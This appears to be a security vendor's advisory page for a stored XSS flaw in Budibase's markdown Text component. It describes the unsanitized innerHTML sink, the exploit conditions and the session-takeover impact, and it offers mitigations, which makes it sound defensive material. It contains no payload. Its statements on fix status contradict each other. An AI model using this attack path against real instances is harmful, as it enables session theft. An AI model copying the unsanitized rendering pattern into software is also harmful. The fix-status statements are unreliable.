How is CVE-2026-48149 exploited?

Network reachability (required): The attacker must reach the Budibase application over the network to submit the malicious markdown payload to the vulnerable table column. Authentication (required): Any low-privilege BASIC app account with WRITE permission on the bound table is sufficient to plant the payload; no admin account is needed to inject, though the payload executes in whatever session views the content. Victim interaction (not-required): No social-engineering or deliberate victim action is needed beyond the victim loading a page that renders the bound column in Markdown mode, which happens passively during normal application use. Attack complexity (info): The exploit is reliable and condition-free: injecting into innerHTML via marked.parse requires no race conditions, memory layout knowledge, or special environmental state.

What is the impact of CVE-2026-48149?

An attacker reads all data accessible in the victim's browser session, including session tokens, cookies, and any application data visible to the logged-in user. An attacker performs state-changing actions on behalf of the victim, including modifying records, creating users, or changing configuration, using the victim's existing permissions. If the payload executes in an admin session, the attacker gains full administrative control over the Budibase instance for the duration of that session.

Back to search

HIGHCVE-2026-48149Published 2026-05-27Modified 2026-05-28CNA GitHub_M

CVE-2026-48149: Budibase: Stored XSS in Text component: BASIC users execute JS in admin session via MarkdownViewer innerHTML + CDN+srcdoc CSP bypass

Budibase is an open-source low-code platform. Prior to 3.39.0, the Budibase Text component renders markdown by assigning marked.parse(markdown) straight to innerHTML with no sanitizer (packages/bbui/src/Markdown/MarkdownViewer.svelte:22). Any column a builder binds to a Text component in Markdown mode is a stored-XSS sink writable by every BASIC app user with WRITE on the underlying table. This vulnerability is fixed in 3.39.0.

HarborGuard Analysis

HarborGuard analysis

Synopsis

Stored cross-site scripting (XSS) in Budibase's Text component allows any BASIC app user with write access to a bound table column to inject arbitrary JavaScript into that column's content, which then executes in the browser session of anyone viewing the rendered markdown. The flaw is reachable over the network without elevated privileges, and successful exploitation gives the attacker full read and write access within the victim's active session, including admin sessions. HarborGuard tracks this advisory and will make a patched-image rebuild available the moment an upstream fix is published.

HarborGuard Coverage

Detection

Detection is available across every HarborGuard environment: the CVE is ingested from upstream advisory feeds within minutes of publication and matched against customer images, including custom-built Budibase images, across all connected registries and CI pipelines.

Available

Triage

HarborGuard scores this finding at CVSS 8.1 (HIGH) and weights it against each environment's compliance policy to determine urgency and routing, directing the alert to the team inbox configured for the affected workload inside each customer org.

Available

Patch

Because no upstream fix version has been published yet, HarborGuard re-checks the Budibase advisory on every ingest cycle and will make a patched-image rebuild available automatically the moment version 3.39.0 or a later fix is released upstream. For customers who opt into auto-remediation, the rebuild, regression run, and PR against affected workloads will be triggered without manual intervention.

Pending upstream

Exploit Conditions

Network reachabilityRequired
The attacker must reach the Budibase application over the network to submit the malicious markdown payload to the vulnerable table column.
AuthenticationRequired
Any low-privilege BASIC app account with WRITE permission on the bound table is sufficient to plant the payload; no admin account is needed to inject, though the payload executes in whatever session views the content.
Victim interactionNot required
No social-engineering or deliberate victim action is needed beyond the victim loading a page that renders the bound column in Markdown mode, which happens passively during normal application use.
Attack complexityDetail
The exploit is reliable and condition-free: injecting into innerHTML via marked.parse requires no race conditions, memory layout knowledge, or special environmental state.

Blast Radius

An attacker reads all data accessible in the victim's browser session, including session tokens, cookies, and any application data visible to the logged-in user.
An attacker performs state-changing actions on behalf of the victim, including modifying records, creating users, or changing configuration, using the victim's existing permissions.
If the payload executes in an admin session, the attacker gains full administrative control over the Budibase instance for the duration of that session.

How HarborGuard Handles This

Available on HarborGuard: this CVE is actively monitored on every ingest cycle because no upstream fix has been published. In the interim, compensating controls worth evaluating include isolating the Budibase service behind a network policy that restricts which internal services it can reach, tightening the Content Security Policy to block inline script execution and untrusted CDN sources, and disabling Markdown rendering on any Text component bound to user-writable columns until a patch ships. When Budibase publishes version 3.39.0 or a later fix, HarborGuard will make a patched-image rebuild available immediately. For customers who opt into auto-remediation and where compliance policy permits, HarborGuard will trigger the rebuild, run regression tests, and open a PR against affected workloads automatically.

See how HarborGuard automates this

CVSS v3.1: 8.1
Severity: HIGH
Fixed in: —
Affected Products: 1

Affected packages

Budibase / budibase
< 3.39.0

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

References

https://github.com/Budibase/budibase/security/advisories/GHSA-57p7-9h9w-xqpw